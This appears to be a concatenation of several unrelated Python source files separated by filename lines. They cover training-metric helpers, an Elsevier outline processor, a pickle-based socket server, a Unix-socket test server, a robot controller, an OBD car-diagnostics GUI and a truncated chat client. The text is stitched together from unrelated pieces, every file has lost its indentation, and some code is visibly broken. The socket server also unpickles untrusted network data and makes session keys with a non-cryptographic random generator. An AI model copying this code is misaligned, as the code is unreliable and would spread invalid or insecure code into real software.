# metrics[f"after_init_mem_gpu_delta"] = self.gpu[stage]["begin"] - self.gpu["init"]["end"]
def stop_and_update_metrics(self, metrics=None):
"""combine stop and metrics update in one call for simpler code"""
if self.skip_memory_metrics:
return
stage = self.derive_stage()
self.stop(stage)
# init doesn't have metrics to update so we just save that data for later stages to retrieve
if metrics is not None:
self.update_metrics(stage, metrics)
def has_length(dataset):
"""
Checks if the dataset implements __len__() and it doesn't raise an error
"""
try:
return len(dataset) is not None
except TypeError:
# TypeError: len() of unsized object
return False
def denumpify_detensorize(metrics):
"""
Recursively calls `.item()` on the element of the dictionary passed
"""
if isinstance(metrics, (list, tuple)):
return type(metrics)(denumpify_detensorize(m) for m in metrics)
elif isinstance(metrics, dict):
return type(metrics)({k: denumpify_detensorize(v) for k, v in metrics.items()})
elif isinstance(metrics, np.generic):
return metrics.item()
elif is_torch_available() and isinstance(metrics, torch.Tensor) and metrics.numel() == 1:
return metrics.item()
return metrics
def number_of_arguments(func):
"""
Return the number of arguments of the passed function, even if it's a partial function.
"""
if isinstance(func, functools.partial):
total_args = len(inspect.signature(func.func).parameters)
return total_args - len(func.args) - len(func.keywords)
return len(inspect.signature(func).parameters)
class ShardedDDPOption(ExplicitEnum):
SIMPLE = "simple"
ZERO_DP_2 = "zero_dp_2"
ZERO_DP_3 = "zero_dp_3"
OFFLOAD = "offload"
AUTO_WRAP = "auto_wrap"
|
elsevier_process_outlines.py
|
import requests
import requests_random_user_agent
import threading
from pymongo import errors, MongoClient
import config
import json
from progress.bar import Bar
threads_amount = 5
threads = list()
def get_title(text):
if '_' in text.keys():
return(text['_'])
else:
aux = ''
for part in text['$$']:
aux += part['_']
return(aux)
def process_entry(text, sections):
if text['#name'] == 'title':
sections.append(get_title(text))
elif text['#name'] == 'entry':
for elem in text['$$']:
sections = process_entry(elem, sections)
# res = process_entry(elem, [], 0)
# print('res:' + str(res))
# sections['subsections'] = res
# sections.append(aux)
# print('->' + str(sections) + '<-')
return(sections)
def process_outline(json_outline):
sections = []
for elem in json_outline:
if elem['$']['type'] == 'sections':
for sec in elem['$$']:
if sec['#name'] == 'title':
sections.append(get_title(sec))
elif sec['#name'] == 'entry':
for entry in sec['$$']:
pass
print(sections)
return(sections)
def process_outlines(bar, sem, db_client, col, sha):
'''
After the processing of the outline, we can have three states:
1. Checked = True; toc = None
2. Checked = True; toc = []
3. Checked = True; toc = [content]
The first state means that it has been process, but an error has been encountered;
the second means that it has been correctly processed, but there are no content;
and the last one means correct execution and available content
'''
with sem:
# bar.next()
db_papers = db_client[config.db_name]
col_to_work = db_papers[col]
sections = {}
try:
json_outline = json.loads(col_to_work.find_one({'sha':sha}, {'_id':0, 'raw':1})['raw'])['outline']
sections = process_outline(json_outline)
col_to_work.update_one({'sha':sha}, {'$set': {'checked':True, 'toc': sections}})
except Exception as e:
col_to_work.update_one({'sha':sha}, {'$set': {'checked':True, 'toc': None}})
raise(e)
def thread_caller(sem, db_client, col):
db_papers = db_client[config.db_name]
col_to_work = db_papers[col]
filter_checked = {'checked': True}
documents = col_to_work.find(filter_checked, {'_id': 0, 'sha': 1})
bar = Bar('Processing', max=col_to_work.count_documents)(filter_checked)
for document in documents:
try:
t = threading.Thread(target=process_outlines, args=(bar, sem, db_client, col, document['sha']))
threads.append(t)
t.start()
except RuntimeError:
pass
except Exception as e:
raise(e)
# print('[0] error obtaining info from "{}"'.format(document['sha']))
for t in threads:
t.join()
bar.finish()
if __name__ == "__main__":
col_elsevier = config.collection_elsevier
db_client = MongoClient(config.mongoURL)
sem = threading.Semaphore(threads_amount)
thread_caller(sem, db_client, col_elsevier)
# process_outlines(None, sem, db_client, col_elsevier, '28ef2f6aa0e0c14f92055d24d72b151fd4da910a')
db_client.close()
|
socketserverhandler.py
|
import socket as pythonsocket
from threading import Thread
from time import sleep
import datetime
import pickle
import datetime
import database
import string
import random
import settings
socket = pythonsocket.socket(pythonsocket.AF_INET, pythonsocket.SOCK_STREAM)
def startServer():
database.beginDataBaseConnection()
database.initDatabase()
server_address = (settings.server_location, int(settings.server_port))
print('Starting server on %s port %s' % server_address)
socket.setsockopt(pythonsocket.SOL_SOCKET, pythonsocket.SO_REUSEADDR, 1)
socket.settimeout(None)
socket.bind(server_address)
socket.listen(5)
socket.settimeout(None)
thread = Thread(target=waitConnect)
thread.start()
servertick = Thread(target=serverTick)
servertick.start()
clients = []
class Client():
def __init__(self, connection, address, authorized):
self.connection = connection
self.address = address
self.authorized = authorized
self.key = None
self.username = None
self.editingScript = None
self.disconnect = False
self.lastPing = datetime.datetime.now()
self.scriptsComplete = []
def waitConnect():
print("Server wait client thread started")
while True:
sleep(0.1)
connection, address = socket.accept()
print("%s Client connected on %s" % (datetime.datetime.now(), address))
client = Client(connection, address, False)
clients.append(client)
clientthread = Thread(target=clientTick, args=[clients[len(clients) - 1]])
clientthread.start()
def getAllClientConnections():
return [client.connection for client in clients]
def sendToAllClients(payload):
for client_con in getAllClientConnections():
try:
sendToClient(client_con, payload)
except Exception:
print("couldn't send to connection %s" % client_con)
def clientTick(client):
print("Server tick thread started for client")
HEADERSIZE = 10
while True:
if client.disconnect:
print("%s SERVER user %s disconnected" % (datetime.datetime.now(), repr(client.username)))
break
full_msg = b''
new_msg = True
while True:
try:
client_connection = client.connection
buf = client_connection.recv(2048)
if new_msg:
try:
msglen = int(buf[:HEADERSIZE])
except ValueError:
print("client disconnect error")
# happens when client disconnects
break
new_msg = False
full_msg += buf
except ConnectionResetError:
print("%s SERVER user %s connecton reset error" % (datetime.datetime.now(), repr(client.username)))
break
download_size = len(full_msg) - HEADERSIZE
if download_size == msglen:
if download_size > 100000:
print(
"%s SERVER received large message (%s)" % (
datetime.datetime.now(), str(download_size / 1000000) + "MB"))
try:
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
except EOFError:
print("%s SERVER user %s disconnected" % (datetime.datetime.now(), repr(client.username)))
break
new_msg = True
full_msg = b""
if not client.authorized:
if "login-attempt" == incomingdata[0]:
print("%s SERVER user %s login attempt" % (datetime.datetime.now(), repr(incomingdata[1])))
username = incomingdata[1]
password = incomingdata[2]
login = (database.login(username, password))
online_users = database.getOnlineUsers()
if username in online_users:
print("%s SERVER user %s already logged in" % (
datetime.datetime.now(), repr(incomingdata[1])))
sendToClient(client_connection, ("login-success", False, None))
else:
if login:
key = generateKey()
client.key = key
client.username = username
sendToClient(client_connection, ("login-success", True, key))
client.authorized = True
print("%s SERVER user %s logged in" % (datetime.datetime.now(), repr(incomingdata[1])))
database.updateUserStatus(username, "ONLINE")
else:
sendToClient(client_connection, ("login-success", False, None))
print("%s SERVER user %s wrong password" % (
datetime.datetime.now(), repr(incomingdata[1])))
else:
if "request-scripts" == incomingdata[1]:
print("%s SERVER user %s request scripts" % (datetime.datetime.now(), repr(client.username)))
if incomingdata[0] == client.key:
print("%s SERVER sending scripts to user %s" % (
datetime.datetime.now(), repr(client.username)))
data = database.getScripts(incomingdata[2])
sendToClient(client_connection, ("scripts-return", data))
pass
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "edit-script" == incomingdata[1]:
scriptno = incomingdata[2]
print("%s SERVER user %s request to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
if incomingdata[0] == client.key:
script_status = database.getScriptStatus(scriptno)
if script_status == "RAW":
print("%s SERVER allowing user %s to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
client.editingScript = scriptno
database.updateScriptStatus("EDITING", client.username, scriptno)
sendToClient(client.connection, ('edit-script-success', True, scriptno))
sendToAllClients(('script-status-update', scriptno, "EDITING", client.username))
print("%s SERVER sending all clients (%s) status update for %s" % (
datetime.datetime.now(), len(getAllClientConnections()), scriptno))
elif script_status == "EDITING":
print("%s SERVER refusing user %s to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
sendToClient(client.connection, ('edit-script-success', False, scriptno))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "upload-video" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
video_generator_payload = incomingdata[3]
script_status = database.getScriptStatus(scriptno)
if script_status == "EDITING":
if scriptno == client.editingScript:
print("%s SERVER allowing user %s to upload script number %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
if database.uploadVid(video_generator_payload, scriptno):
database.updateScriptStatus("COMPLETE", client.username, scriptno)
sendToClient(client_connection, ('script-upload-success', True, scriptno))
client.scriptsComplete.append(scriptno)
client.editingScript = None
else:
sendToClient(client_connection, ('script-upload-success', False, scriptno))
sendToAllClients(('script-status-update', scriptno, "COMPLETE", client.username))
else:
print(
"%s SERVER user %s script number %s does not match what client is editing %s" % (
datetime.datetime.now(), repr(client.username), scriptno,
client.editingScript))
else:
print("%s SERVER user %s script status is %s" % (
datetime.datetime.now(), repr(client.username), script_status))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "quit-editing" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
if client.editingScript == scriptno:
database.updateScriptStatus("RAW", None, scriptno)
print("%s SERVER user %s quit editing %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
sendToAllClients(('script-status-update', scriptno, "RAW", None))
client.editingScript = None
else:
print("%s SERVER user %s not editing script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "flag-scripts" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
flagtype = incomingdata[3]
database.updateScriptStatus(flagtype, client.username, scriptno)
print("%s SERVER user %s flagging script %s as %s" % (
datetime.datetime.now(), repr(client.username), scriptno, flagtype))
sendToAllClients(('script-status-update', scriptno, flagtype, client.username))
client.editingScript = None
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "PING" == incomingdata[1]:
if incomingdata[0] == client.key:
client.lastPing = datetime.datetime.now()
print("%s SERVER sending PONG to %s" % (datetime.datetime.now(), repr(client.username)))
sendToClient(client.connection, ('PONG',))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
if (datetime.datetime.now().minute - client.lastPing.minute) > 2:
print("%s SERVER no PING from %s in 2 minutes. Disconnecting" % (
datetime.datetime.now(), repr(client.username)))
client.disconnect = True
print("%s SERVER Thread shutting down" % datetime.datetime.now())
client.disconnect = True
break
def sendToClient(client_connection, payloadattachment):
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
client_connection.sendall(payload)
def handleCompletedScripts():
while True:
pass
def serverTick():
global clients
while True:
sleep(0.1)
scriptsbeingedited = database.getScriptEditInformation() # gets information of scripts with EDITING status
sciptsbeingeditedby = [editedby[2] for editedby in scriptsbeingedited] # gets names of scripts with editedby
online_users = database.getOnlineUsers()
clientIndexToRemove = []
if clients:
for i, client in enumerate(clients):
if client.username in sciptsbeingeditedby:
indexOfScript = sciptsbeingeditedby.index(client.username)
scriptno = scriptsbeingedited[indexOfScript][0]
# set script client was editing to raw
if not client.editingScript == scriptno and scriptno not in client.scriptsComplete:
print("%s SERVER setting status of script %s to RAW because client is not editing it" % (
datetime.datetime.now(), scriptno))
database.updateScriptStatus("RAW", None, scriptno)
for client_con in getAllClientConnections():
sendToClient(client_con, ('script-status-update', scriptno, "RAW", None))
if client.disconnect: # if client disconnects set script to raw
clientIndexToRemove.append(i)
else:
if scriptsbeingedited:
for script in scriptsbeingedited:
database.updateScriptStatus("RAW", None, script[0])
for client_con in getAllClientConnections():
sendToClient(client_con, ('script-status-update', scriptno, "RAW", None))
print("%s SERVER setting status of all scrips to RAW as there are no clients." % (
datetime.datetime.now()))
if online_users:
for user in online_users:
database.updateUserStatus(user, None)
print("%s SERVER removing online status for %s as there are no clients" % (
datetime.datetime.now(), user))
if clientIndexToRemove:
for index in clientIndexToRemove:
print("deleted clients")
try:
if clients[index].username is not None:
database.updateUserStatus(clients[index].username, None)
for client in clients:
if not client.disconnect:
sendToClient(client.connection,
('script-status-update', clients[index].editingScript, "RAW", None))
except IndexError:
pass
try:
new_clients = []
for i in range(len(clients)):
if not clients[index] == clients[i]:
new_clients.append(clients[i])
clients = new_clients
except IndexError:
print("could not update client list")
if scriptsbeingedited:
pass
def generateKey():
"""Generate a random string of letters, digits and special characters """
password_characters = string.ascii_letters + string.digits + string.punctuation
return ''.join(random.choice(password_characters) for i in range(10))
|
test.py
|
# python3
SERVER_SOCKET_PATH = _s = 'socket'
import socket, sys, os, threading, struct
def pe(s):
print(s, file=sys.stderr)
def th(b):
# network is big endian
return int.from_bytes(b, 'big', signed=False)
def trans(b):
msg = b''
for x in b:
msg += struct.pack('!I', x)
return msg
l = threading.Lock()
t = {}
def proc(s):
global l, t
l.acquire()
cmd = s[0]
msg = []
if cmd == 1:
(set, key, score) = s[1:]
if set not in t:
t[set] = {}
if key not in t[set]:
t[set][key] = 0
t[set][key] = score
msg.append(0)
elif cmd == 2:
(set, key) = s[1:]
if set in t:
t[set].pop(key, None)
msg.append(0)
elif cmd == 3:
set = s[1]
size = 0
if set in t:
size = len(t[set])
msg += [ 1, size ]
elif cmd == 4:
(set, key) = s[1:]
score = 0
if set in t and key in t[set]:
score = t[set][key]
msg += [ 1, score ]
elif cmd == 5:
results = []
(lo, hi) = s[-2:]
for set in s[1:-3]:
if set in t:
for k, v in t[set].items():
if lo <= k <= hi:
results.append((k, v))
results.sort(key=lambda x: (x[0], x[1]))
# disconn
elif cmd == 6:
msg = None
l.release()
return msg
def thd(conn):
flag = 1
q = []
while flag:
s = conn.recv(4) # good enough
l = th(s)
q.append([])
if l == 0:
flag = 0
continue
for i in range(l):
q[-1].append(th(conn.recv(4)))
msg = proc(q[-1])
print('thd msg', conn, msg)
if msg:
msg = trans(msg)
conn.send(msg)
# disconn
else:
flag = 0
conn.close()
def server_run():
try:
os.unlink(_s)
except OSError:
if os.path.exists(_s):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(_s)
sock.listen(1)
for x in range(8):
(conn, addr) = sock.accept()
threading.Thread(target=thd, args=(conn, ), daemon=False).start()
sock.close()
def str_to_int(s):
return([ int(x) for x in s.split() ])
# args = [ 'line 1', 'line 2', ... ]
def proc_input(args):
pass
def wait():
for x in range(10 ** 6):
pass
def client_run(args, verbose=False):
wait()
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(_s)
r = []
for x in args:
sock.send(trans(x))
r.append(sock.recv(1024)) # good enough for test purposes
if verbose:
for x in r:
print(x)
wait()
return r
def test():
threading.Thread(target=server_run, daemon=True).start()
client_run([ (4, 1, 0, 1, 10), (2, 3, 0), (3, 4, 0, 1) ], verbose=True)
if __name__ == '__main__':
from sys import argv
if argv.pop() == 'test':
test()
else:
server_run()
|
robot.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""FetchCore robot controller."""
import logging
import datetime
import threading
from copy import deepcopy
from typing import Dict
from kubernetes.client.rest import ApiException
from k8scrhandler.k8scrhandler import K8sCRHandler
from .fetchrobot import FetchRobots
from .helper import get_sample_cr, MainLoopController
_LOGGER = logging.getLogger(__name__)
class RobotController(K8sCRHandler):
"""FetchCore robot controller."""
def __init__(self, fetch_robots: FetchRobots) -> None:
"""Construct."""
# Instance with all FetchCore robots
self._fetch_robots = fetch_robots
self.robottypes: Dict[str, bool] = {}
# Super constructor for robot CR
self.robot_template_cr = get_sample_cr('robco_robot')
super().__init__(
'registry.cloudrobotics.com',
'v1alpha1',
'robots',
'default',
self.robot_template_cr,
{}
)
# Create instance for robottypes CR
template_robottype_cr = get_sample_cr('robco_robottype')
self.robottype_controller = K8sCRHandler(
'registry.cloudrobotics.com',
'v1alpha1',
'robottypes',
'default',
template_robottype_cr,
{}
)
# Init threads
self.robot_status_update_thread = threading.Thread(target=self._update_robot_status_loop)
# register callbacks
self.robottype_controller.register_callback(
'robot', ['ADDED', 'MODIFIED', 'REPROCESS'], self.robottype_cb)
self.register_callback(
'robot', ['ADDED', 'REPROCESS'], self.robot_cb)
self.register_callback(
'robot_deleted', ['DELETED'], self.robot_deleted_cb)
def robot_cb(self, name: str, custom_res: Dict) -> None:
"""Process robot CR callback data."""
# Check if robot is a Fetch robot
robottype = custom_res.get('spec', {}).get('type')
is_fetch = self.robottypes.get(robottype, False)
if is_fetch:
# Fetch robot is not in FetchCore watch list, add it
try:
self._fetch_robots.get_robot(name)
except ValueError:
self._fetch_robots.add_robot(name)
_LOGGER.info('Added robot %s to FetchCore watch list', name)
def robot_deleted_cb(self, name: str, custom_res: Dict) -> None:
"""Process robot delete CR callback data."""
# Check if robot is a Fetch robot
robottype = custom_res.get('spec', {}).get('type')
is_fetch = self.robottypes.get(robottype, False)
if is_fetch:
# Remove robot from FetchCore watch list
self._fetch_robots.remove_robot(name)
_LOGGER.info('Removed robot %s from FetchCore watch list', name)
def robottype_cb(self, name: str, custom_res: Dict) -> None:
"""Process robottype CR callback data."""
self.robottypes[name] = bool(custom_res.get('spec', {}).get('make') == 'fetch')
def run(self, reprocess: bool = False, multiple_executor_threads: bool = False) -> None:
"""
Start running all callbacks.
Supporting multiple executor threads for blocking callbacks.
"""
# Initial load of robot types
robot_type_crs = self.robottype_controller.list_all_cr(use_cache=False)
for custom_res in robot_type_crs:
name = custom_res.get('metadata', {}).get('name')
spec = custom_res.get('spec')
if name and spec:
self.robottype_cb(name, custom_res)
# Initial load of robots
robot_crs = self.list_all_cr(use_cache=False)
for custom_res in robot_crs:
name = custom_res.get('metadata', {}).get('name')
spec = custom_res.get('spec')
if name and spec:
self.robot_cb(name, custom_res)
# Initial load from FetchCore
self._fetch_robots.update()
# Start watcher threads
self.robottype_controller.run(reprocess, multiple_executor_threads)
super().run(reprocess, multiple_executor_threads)
# Start update thread
self.robot_status_update_thread.start()
def stop_watcher(self) -> None:
"""Stop watching CR stream."""
# Stop robottype and robot watchers
self.robottype_controller.stop_watcher()
super().stop_watcher()
def _update_robot_status_loop(self) -> None:
"""Run update robot status continiously."""
loop_control = MainLoopController()
_LOGGER.info('Watch robot status loop started')
while self.thread_run:
try:
self.update_robot_status()
loop_control.sleep(2)
except Exception as err: # pylint: disable=broad-except
_LOGGER.error('Error updating status of robots: %s', err, exc_info=True)
# On uncovered exception in thread save the exception
self.thread_exceptions['status_loop'] = err
# Stop the watcher
self.stop_watcher()
_LOGGER.info('Watch robot status loop stopped')
def update_robot_status(self) -> None:
"""Continously update status of robot CR."""
status = deepcopy(self.robot_template_cr)['status']
# Get updated robot states from FetchCore
self._fetch_robots.update()
# Update robot CR status
for name, robot in self._fetch_robots.robots.items():
status['configuration']['trolleyAttached'] = robot.trolley_attached
status['robot']['batteryPercentage'] = robot.battery_percentage
status['robot']['lastStateChangeTime'] = robot.last_state_change
status['robot']['state'] = robot.state
status['robot']['updateTime'] = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
try:
self.update_cr_status(name, status)
except ApiException:
_LOGGER.error('Status CR of robot %s could not be updated', name)
|
KatyOBD.py
|
import obd
import tkinter as tk
import time
import threading
### OBD Connection
connection = obd.OBD()
### Helper Functions
str_rpm = '0'
str_speed = '0'
str_coolant_temp = '0'
str_fuel_level = '0'
str_intake_temp = '0'
str_throttle_pos = '0'
str_intake_pressure = '0'
indicator = 0
def parseAuto():
global str_rpm, str_speed, str_coolant_temp, str_fuel_level, str_intake_temp, str_throttle_pos, str_intake_pressure, indicator
while(1):
# Determine Whether Meet the Requirements
if indicator == 1:
break
# Parameter Adoptions
cmd_rpm = obd.commands.RPM
cmd_speed = obd.commands.SPEED
cmd_coolant_temp = obd.commands.COOLANT_TEMP
cmd_fuel_level = obd.commands.FUEL_LEVEL
cmd_intake_temp = obd.commands.INTAKE_TEMP
cmd_throttle_pos = obd.commands.THROTTLE_POS
cmd_intake_pressure = obd.commands.INTAKE_PRESSURE
# Assignment of Values to Varible 'Response'
response_rpm = connection.query(cmd_rpm)
response_speed = connection.query(cmd_speed)
response_coolant_temp = connection.query(cmd_coolant_temp)
response_fuel_level = connection.query(cmd_fuel_level)
response_intake_temp = connection.query(cmd_intake_temp)
response_throttle_pos = connection.query(cmd_throttle_pos)
response_intake_pressure = connection.query(cmd_intake_pressure)
# Change Obj to String
str_rpm = str(response_rpm.value)
str_speed = str(response_speed.value)
str_coolant_temp = str(response_coolant_temp.value)
str_fuel_level = str(response_fuel_level.value)
str_intake_temp = str(response_intake_temp.value)
str_throttle_pos = str(response_throttle_pos.value)
str_intake_pressure = str(response_intake_pressure.value)
# Delay Parsing Time
time.sleep(0.01)
def stopParsing():
global indicator
indicator = 1
def about():
about_root=tk.Tk()
w = 780 # width for the Tk root
h = 480 # height for the Tk root
# get screen width and height
ws = about_root.winfo_screenwidth() # width of the screen
hs = about_root.winfo_screenheight() # height of the screen
# calculate x and y coordinates for the Tk root window
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
# set the dimensions of the screen
# and where it is placed
about_root.geometry('%dx%d+%d+%d' % (w, h, x, y))
about_root.title('About Katy OBD')
label_author=tk.Label(about_root,text='Katy OBD Version 1.0', font=('tahoma', 24))
label_author.place(x=200,y=60)
label_author=tk.Label(about_root,text='Copyright (C) 2017', font=('tahoma', 24))
label_author.place(x=225,y=120)
label_author=tk.Label(about_root,text='Author: Chuan Yang', font=('tahoma', 24))
label_author.place(x=225,y=180)
label_author=tk.Label(about_root,text='Shengjing Hospital of China Medical University', font=('tahoma', 22))
label_author.place(x=100,y=240)
button_refresh=tk.Button(about_root, width=15, text='OK', font=('tahoma', 24), command=about_root.destroy)
button_refresh.place(x=230, y=330)
about_root.mainloop()
### Thread Management
def start_thread(event):
global thread, indicator
indicator = 0
thread = threading.Thread(target=parseAuto)
thread.daemon = True
text_rpm.delete('1.0', tk.END)
text_rpm.insert('1.0', str_rpm)
text_speed.delete('1.0', tk.END)
text_speed.insert('1.0', str_speed)
text_coolant_temp.delete('1.0', tk.END)
text_coolant_temp.insert('1.0', str_coolant_temp)
text_fuel_level.delete('1.0', tk.END)
text_fuel_level.insert('1.0', str_fuel_level)
text_intake_temp.delete('1.0', tk.END)
text_intake_temp.insert('1.0', str_intake_temp)
text_throttle_pos.delete('1.0', tk.END)
text_throttle_pos.insert('1.0', str_throttle_pos)
text_intake_pressure.delete('1.0', tk.END)
text_intake_pressure.insert('1.0', str_intake_pressure)
thread.start()
root.after(20, check_thread)
def check_thread():
if thread.is_alive():
text_rpm.delete('1.0', tk.END)
text_rpm.insert('1.0', str_rpm)
text_speed.delete('1.0', tk.END)
text_speed.insert('1.0', str_speed)
text_coolant_temp.delete('1.0', tk.END)
text_coolant_temp.insert('1.0', str_coolant_temp)
text_fuel_level.delete('1.0', tk.END)
text_fuel_level.insert('1.0', str_fuel_level)
text_intake_temp.delete('1.0', tk.END)
text_intake_temp.insert('1.0', str_intake_temp)
text_throttle_pos.delete('1.0', tk.END)
text_throttle_pos.insert('1.0', str_throttle_pos)
text_intake_pressure.delete('1.0', tk.END)
text_intake_pressure.insert('1.0', str_intake_pressure)
root.after(20, check_thread)
### TKinter Mainflow
root = tk.Tk()
root.geometry("{0}x{1}+0+0".format(root.winfo_screenwidth(), root.winfo_screenheight()))
#root.attributes('-fullscreen', True)
root.title('Katy OBD -- On Board Diagnostics Parser')
#root.iconbitmap('dna.ico')
y0 = 150
y1 = 400
y2 = 580
y3 = 690
# Label & Edit Box
text_rpm = tk.Text(root, width=10, height=1, font=('tahoma', 80), bd=2, wrap='none')
text_rpm.place(x=50, y=y0)
label_rpm = tk.Label(root, text='RPM', font=('tahoma', 40))
label_rpm.place(x=50,y=y0-100)
text_speed = tk.Text(root, width=10, height=1, font=('tahoma', 80), bd=2, wrap='none')
text_speed.place(x=750, y=y0)
label_speed = tk.Label(root, text='Speed', font=('tahoma', 40))
label_speed.place(x=750,y=y0-100)
# ////////////////////////////
text_coolant_temp = tk.Text(root, width=10, height=1, font=('tahoma', 40), bd=2, wrap='none')
text_coolant_temp.place(x=50, y=y1)
label_coolant_temp = tk.Label(root, text='Coolant Temperature', font=('tahoma', 30))
label_coolant_temp.place(x=50,y=y1-80)
text_fuel_level = tk.Text(root, width=17, height=1, font=('tahoma', 40), bd=2, wrap='none')
text_fuel_level.place(x=650, y=y1)
label_fuel_level = tk.Label(root, text='Fuel Level', font=('tahoma', 30))
label_fuel_level.place(x=650,y=y1-80)
label_fuel_level_percentage = tk.Label(root, text='%', font=('tahoma', 40))
label_fuel_level_percentage.place(x=1200,y=y1)
# ////////////////////////////////////
text_intake_temp = tk.Text(root, width=10, height=1, font=('tahoma', 30), bd=2, wrap='none')
text_intake_temp.place(x=50, y=y2)
label_intake_temp = tk.Label(root, text='Intake Air Temperature', font=('tahoma', 25))
label_intake_temp.place(x=50,y=y2-70)
text_intake_pressure = tk.Text(root, width=15, height=1, font=('tahoma', 30), bd=2, wrap='none')
text_intake_pressure.place(x=500, y=y2)
label_intake_pressure = tk.Label(root, text='Intake Manifold Pressure', font=('tahoma', 25))
label_intake_pressure.place(x=500,y=y2-70)
text_throttle_pos = tk.Text(root, width=10, height=1, font=('tahoma', 30), bd=2, wrap='none')
text_throttle_pos.place(x=1020, y=y2)
label_throttle_pos = tk.Label(root, text='Throttle Position', font=('tahoma', 25))
label_throttle_pos.place(x=1020,y=y2-70)
label_throttle_pos_percentage = tk.Label(root, text='%', font=('tahoma', 30))
label_throttle_pos_percentage.place(x=1300,y=y2)
# Buttons
button_start = tk.Button(root, text="Start", width=12, font=('tahoma', 30), command=lambda:start_thread(None))
button_start.place(x=50, y=y3)
button_stop = tk.Button(root, text="Stop", width=12, font=('tahoma', 30), command=stopParsing)
button_stop.place(x=400, y=y3)
button_about = tk.Button(root, text="About...", width=12, font=('tahoma', 30), command=about)
button_about.place(x=745, y=y3)
button_exit = tk.Button(root, text="Exit", width=10, font=('tahoma', 30), command=root.destroy)
button_exit.place(x=1100, y=y3)
root.bind('<Return>', start_thread)
root.mainloop()
|
client.py
|
import json
import logging
import socket
import threading
import os
import sys
currentdir = os.path.dirname(os.path.realpath(__file__))
parentdir = os.path.dirname(currentdir)
sys.path.append(parentdir)
from validator import port_validation, ip_validation
DEFAULT_PORT = 9090
DEFAULT_IP = "127.0.0.1"
END_MESSAGE_FLAG = "CRLF"
# Настройки логирования
logging.basicConfig(
format="%(asctime)-15s [%(levelname)s] %(funcName)s: %(message)s",
handlers=[logging.FileHandler("./logs/client.log")],
level=logging.INFO,
)
logger = logging.getLogger(__name__)
class Client:
def __init__(self, server_ip: str, port_number: int) -> None:
self.server_ip = server_ip
self.port_number = port_number
self.sock = None
self.new_connection()
# Авторизуемся
self.send_auth()
# Поток чтения данных от сервера
t = threading.Thread(target=self.read_message)
t.daemon = True
t.start()
# Работа с данными, поступающими от пользователя
self.input_processing()
def new_connection(self):
"""Осуществляет новое соединение по сокету"""
ip, port = self.server_ip, self.port_number
sock = socket.socket()
sock.setblocking(1)
sock.connect((ip, port))
self.sock = sock
logging.info(f"Успешное соединение с сервером {ip}:{port}")
def send_reg(self, password):
"""Логика регистрации пользователя в системе"""
print("*Новая регистрация в системе*")
while True:
input_username = input("Введите ваше имя пользователя (ник) -> ")
if input_username == "":
print("Имя пользователя не может быть пустым!")
else:
data = json.dumps(
{"password": password, "username": input_username},
ensure_ascii=False,
)
self.sock.send(data.encode())
logger.info(f"Отправка данных серверу: '{data}'")
# Получаем данные с сервера
response = json.loads(self.sock.recv(1024).decode())
if not response["result"]:
raise ValueError(
f"Не удалось осуществить регистрацию, ответ сервера {response}, более подробно см логи сервера"
)
logger.info("Успешно зарегистрировались")
break
def send_auth(self):
"""Логика авторизации клиента"""
login_iter = 1
while True:
# Отдельные строки для объяснения механизма авторизации при первом входе
req_password_str = "Введите пароль авторизации"
req_password_str += (
"\nЕсли это ваш первый вход в систему, то он будет использоваться для последующей авторизации в системе -> "
if login_iter == 1
else " -> "
)
user_password = input(req_password_str)
if user_password != "":
data = json.dumps({"password": user_password}, ensure_ascii=False)
# Отправляем сообщение
self.sock.send(data.encode())
logger.info(f"Отправка данных серверу: '{data}'")
# Получаем данные с сервера
response = json.loads(self.sock.recv(1024).decode())
# Если успешно авторизовались
if response["result"]:
print(
"Авторизация прошла успешно, можете вводить сообщения для отправки:"
)
break
# Если авторизация не удалась
elif response["description"] == "wrong auth":
print("Неверный пароль!")
# Делаем новое соединение
# т.к. сервер рвет соединение, если авторизация не удалась
self.new_connection()
# Если это первый вход с таким ip-адресом, то необходима регистрация
elif response["description"] == "registration required":
self.new_connection()
self.send_reg(user_password)
self.new_connection()
else:
raise ValueError(
f"Получили неожиданный ответ от сервера: {response}"
)
else:
print("Пароль не может быть пустым")
login_iter += 1
def read_message(self):
"""Чтение сообщения"""
data = ""
while True:
# Получаем данные и собираем их по кусочкам
chunk = self.sock.recv(1024)
data += chunk.decode()
# Если это конец сообщения, то значит, что мы все собрали и можем обратно отдавать клиенту
if END_MESSAGE_FLAG in data:
logger.info(f"Прием данных от сервера: '{data}'")
data = data.replace(END_MESSAGE_FLAG, "")
data = json.loads(data)
message_text, user_name = data["text"], data["username"]
print(f"[{user_name}] {message_text}")
data = ""
# Если приняли часть данных - сообщаем
else:
logger.info(f"Приняли часть данных от сервера: '{data}'")
def send_message(self, message: str):
